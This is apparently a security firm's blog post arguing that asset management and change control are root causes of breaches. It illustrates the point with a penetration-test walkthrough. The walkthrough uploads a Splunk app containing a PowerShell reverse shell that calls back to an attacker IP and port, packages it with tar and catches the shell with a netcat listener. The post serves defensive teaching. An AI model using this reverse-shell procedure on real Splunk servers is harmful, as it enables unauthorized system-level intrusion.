An Introduction to Our View
What better way to start our technical blog series than by connecting technical issues to the deeper, fundamental ones behind them? We pride ourselves on dismantling the status quo surrounding how issues are perceived within the organizations that we work with. In practice, that means distilling technical issues into actionable roadmaps our clients can implement, not just to address the immediate technical issue, but to fundamentally mature their information security program so they can discover root causes and defend against them in the future.
“We pride ourselves on dismantling the status quo surrounding how issues are perceived within the organizations that we work with.”
Root Cause Analysis
The idea of “root-cause” analysis has become a commoditized phrase in the field over the years, while the uptake of truly multidimensional remediation remains far from where it should be. This is particularly apparent when we get the opportunity to help clients through issues similar to ones they’ve faced in the past. The “why” behind a client’s status quo becomes much clearer when we look at the guidance provided by the previous assessor, which most of the time centers simply on fixing the host, URL, or software package associated with a finding on the report that was delivered.
We’re not here to dissect those reports in particular, but the fact remains: the chain of controls necessary to achieve what we call true remediation is far broader than what such reports typically promote.
This lack of understanding makes resilient security programs very hard to come by.
“Resilient” — You Say?
Resilient is another keyword in the cyber industry. We find it odd that a word whose meaning is directly tied to withstanding continued threats is promoted by so many, yet that meaning is lost, or even absent, in the “remediation guidance” typically attached to technical findings on reports. Resilient means that you can sustain all attacks, not just the ones that you know about. Resilient means processes are in place to protect against deviations from the established normality of operations. Resilient means that you know, at minimum, what you have to protect.
“Resilient means that you can sustain all attacks, not just the ones that you know about.”
Lapses in asset management are frequently responsible for breaches and for initial footholds during penetration tests and red team assessments. In fact, asset inventory is appropriately the most important control called out by leading control frameworks (NIST, SANS, CIS CSC). Often these lapses are the result of weak, and in some cases non-existent, change control processes. Other factors, such as missing hardening templates for systems, policy violations, and/or a lack of business processes, can also contribute to asset management mishaps. Too often, default passwords, overly permissive services, and application misuse become the first steps toward a full compromise.
Let’s take a look at how one type of unintentional (seemingly innocent) lapse can lead to cracks across your entire environment.
Splunk Service Misuse
The following example is based on a real-world assessment our team at Vartai performed some time ago. During a network discovery scan looking for specific, well-known web service ports, we encountered a service hosted on port 8000. A common application that defaults to port 8000 is Splunk, which can be used to search, monitor, and analyze logs and big data of all shapes and sizes. To support these functions, Splunk includes an underlying script execution feature that, if left unchecked, can become a threat actor’s entry point. In this instance, a privileged user had violated the information security policy and installed Splunk without going through change control. The installed version of Splunk required no authentication, and we knew that some of Splunk’s functions allow execution of scripts on both Windows and Unix-type operating systems. The Splunk service itself was running in the context of the powerful NT AUTHORITY\SYSTEM account, which allowed us to obtain a connection to the victim machine as a privileged system shell.
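The discovery step above can be sketched as follows. This is an illustrative example, not output from the actual engagement: the target range, file name, and sample results are all assumptions, and the nmap invocation is shown as a comment so the snippet stands alone.

```shell
# Hypothetical discovery sweep for common web service ports, e.g.:
#   nmap -p 80,443,8000,8080 -oG web_scan.gnmap 10.0.0.0/24
# Below, a made-up sample of greppable output stands in for a real scan.
cat > web_scan.gnmap <<'EOF'
Host: 10.0.0.12 ()	Ports: 80/open/tcp//http///, 8000/closed/tcp//http-alt///
Host: 10.0.0.37 ()	Ports: 8000/open/tcp//http-alt///
EOF

# Pull out hosts with port 8000 open: candidates for a Splunk console.
awk '/8000\/open/ {print $2}' web_scan.gnmap   # prints 10.0.0.37
```

Any host that answers on 8000 then gets a manual look in a browser to confirm whether it really is a Splunk web console.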
The following is the Technical Walkthrough for the above scenario.
Summary of Steps
1) The Assessor discovers a Splunk server running an open console that requires no credentials.
2) Splunk allows applications to be uploaded; the Assessor packages a custom application with an embedded reverse shell.
3) The Assessor leverages this attack to run remote commands on the underlying server and ultimately gain full control over it via a system shell.
Accessing the Console
First, we find an accessible Splunk installation that is not password protected. Some versions of Splunk turn off authentication once the trial period expires; after that, the Splunk console becomes accessible for all to use, and to misuse.
Setting up our Attack Workspace
We create a new tools directory with the mkdir command within our Kali Linux installation, then copy a Splunk reverse shell script into that working folder so we can access it.
We have tested the linked script in our lab and reviewed its code. Currently the script will function on both Windows and Linux machines alike, but today we’re going to demonstrate on Windows. Feel free to obtain a free copy via our GitHub repo below.
root@kali:~/tools# git clone https://github.com/vartai-security/reverse_shell_splunk.git
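For context, a Splunk app of this kind is just a directory containing a scripted input. The sketch below shows the typical layout of such an app in comments, plus the inputs.conf stanza that makes it work; treat the exact file names and values as assumptions and check the repo itself for the authoritative versions.

```ini
# Typical layout of the app directory (illustrative):
#   reverse_shell_splunk/
#     bin/run.ps1           <- PowerShell reverse shell (edit IP/port here)
#     bin/run.bat           <- Windows wrapper that launches run.ps1
#     default/inputs.conf
#
# default/inputs.conf registers the script as a scripted input,
# so Splunk executes it automatically once the app is installed.
[script://.\bin\run.bat]
disabled = 0
interval = 10
sourcetype = shell
```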
Editing the Reverse Shell Files
Using your preferred text editor in Kali, insert your attacking IP and preferred port in the "/root/tools/reverse_shell_splunk/run.ps1" file.
In this example, the victim machine will connect back to IP 10.10.14.2 on port 8555.
Packaging the Splunk App and Starting a Reverse Shell Listener
After you’ve made your edits to the run.ps1 file above, you’re ready to package the directory containing it so that it can be understood by the Splunk console.
In this case, we’re going to use the tar command to package the directory into a file that Splunk can understand, denoted by the .spl file extension. We also start a Netcat listener on our chosen port (8555) to catch the incoming connection.

tar -cvzf reverse_shell_splunk.spl reverse_shell_splunk

nc -nlvp 8555
Installing the Reverse Shell Splunk Application
Now we’re ready to install the newly packaged Splunk application into the Splunk Console so that we can execute it and make headway into gaining a shell on the installation.
You’ll want to click the “Gear” icon at the top left to open the menu for uploading a new file.
Click “Install app from file,” browse to and select the reverse_shell_splunk.spl package you created earlier, and select “Upload.”
Catching the Shell
Now we’re ready to listen for Splunk to connect back to our system using the Splunk app we’ve created. Since we had the authority to upload a new application, the Splunk console trusts that we have no evil intentions and executes the application code contained within our package without thinking twice.
As you can see above, an NT AUTHORITY\SYSTEM shell was achieved. From this point, we were able to further escalate our privileges to enterprise administrator over the course of our engagement.
Unfortunately, scenarios like these are common and usually stem from one or more contributing factors. Let’s examine some of the factors that don’t get communicated on standard reports when issues like these arise.
There is a reason that Asset Management, or the internal process to track, correlate, and document assets that are IP bound in the environment, is the most important control set called out by frameworks such as the CSC Top 20.
You cannot defend what you are not aware of. The fact is that Asset Management informs the rest of the Risk Management Framework (RMF). If you do not have an accurate listing of assets that you must protect, you do not have an accurate list of operating systems to patch, of applications to patch, of roles and access rights to lock down; the list continues.
You don’t have a list of devices to configure audit logging; you don’t have a list of devices for which you must apply a valid Security Configuration Checklist; and further — if you don’t have a baseline of security defined within a checklist, there’s no way that you can perform configuration management on a periodic basis to ensure those minimum security controls are operating as intended.
“You cannot defend what you are not aware of. The fact is that Asset Management informs the rest of the Risk Management Framework (RMF).”
In the example above, we had a valid system that was being tracked at the server level, that is, at the IP address/hostname level. That meant the “system” was actually on an inventory, somewhere in the client’s environment. IT staff thought they were doing their job. They thought that’s what the compliance frameworks meant by “Asset Management.”
They were wrong.
Assets Are Not Just IP addresses
You see, there’s more to Asset Management than just having a list of IP addresses for each system in your environment. Asset Management is about “managing” the assets throughout the RMF. True Asset Management uses the metadata associated with each asset as validated inputs to help govern virtually all of the supporting controls you might think you need to secure a device (e.g., configuration management, logging, auditing, patch management, flaw remediation, vulnerability management, change control, administrative access; the list goes on).
So, what is in the meta-data that is so important?
That’s where the power of true Asset Management can help you mature your other processes. Ultimately, though, an “Asset” in the sense a hacker means it is just a port. A service. A protocol. Hosts have IP addresses; those IP addresses have ports (open or closed), which have protocols tied to them. Those protocols have services, and so on up the chain until we arrive at specific applications using those services, protocols, and ports to communicate data throughout your enterprise.
“When attackers “attack” they attack the port. They attack the service running on the port. They attack the application using the service running on the port.”
What does “Asset” really mean?
The takeaway here is that effective network security is centered on the ability to track your assets the way hackers track your assets: at the port, service, protocol, and application level. It sounds like a big task, and it is, which is why it is so important, and so often overlooked, in the industry and throughout enterprise networks small and large.
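As a minimal sketch of what tracking at that level can look like, the snippet below compares a hypothetical approved baseline of host:port/service entries against a fresh discovery scan and flags anything listening that was never approved. All file names and entries are made up for illustration; a real program would feed this from its discovery tooling and asset inventory.

```shell
# Hypothetical approved baseline of host:port/service entries.
cat > baseline.txt <<'EOF'
10.0.0.37:22/ssh
10.0.0.37:443/https
EOF

# Hypothetical latest discovery scan of the same host.
cat > scan.txt <<'EOF'
10.0.0.37:22/ssh
10.0.0.37:443/https
10.0.0.37:8000/splunk-web
EOF

# comm -13 prints lines unique to the second (sorted) file: services
# that are listening but were never approved, like a rogue Splunk console.
sort -o baseline.txt baseline.txt
sort -o scan.txt scan.txt
comm -13 baseline.txt scan.txt   # prints 10.0.0.37:8000/splunk-web
```

Anything this check surfaces should flow straight into the change control process for investigation, which is exactly the integration the client in our example was missing.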
But Sir, we have an SDLC!
The other main breakdown, associated with the client’s Software Development Lifecycle (SDLC), is also directly tied to their Asset Management.
In our example, the client had a formal process to validate and approve the changes they knew about within the environment. This limited awareness ultimately led to a false sense of security and a lack of critical thinking about how they defined a “change.”
“Changes in the environment happen all the time. In this case, a rogue change to install Splunk meant that the entire network fell to compromise.”
Changes in the environment happen all the time. In this case, a rogue change to install Splunk meant that the entire network fell to compromise. That change lived outside the defined SDLC process, and thus never had a chance of being discovered, let alone remediated.
The link to Asset Management is critical here. If the client had been appropriately using network and application discovery tools to identify changes to their baseline state of “Assets” (e.g., ports, protocols, services, applications), they would have identified the Splunk installation and prevented this compromise. The fact that Asset Management was only being performed at the IP address level was the first flaw in their internal processes. The second was the lack of Change Management maturity with respect to the granularity at which they checked for new changes. The third, and by no means the last, was the lack of integration between the change identification process and their validated SDLC process.
Back to Basics
Ultimately, we come back to the core principle of only being able to protect what you know you have. We could continue to define ways the entire enterprise strategy for security had failed to catch the client’s issue that led to compromise, but it would be a book, rather than a blog post.
“The final takeaway is that not only should a company work to fix issues that are found on security assessments, but they should look for a root cause analysis that drives enhanced capability and maturity throughout their entire Risk Management Framework.”
Each “finding” is an opportunity to examine the greater weaknesses that persist in the people, processes, and technology of the organization, not just another change request to disable a service or uninstall the rogue application that led to a compromise during a security assessment.
Having insight into the web of interactions necessary to deploy an effective security program is one of the most important abilities and responsibilities of the CISO and the rest of their security staff. At minimum, your assessment providers should help inform and augment these abilities.
Interested in hearing more about our services?
Contact us at email@example.com to discuss your unique project needs.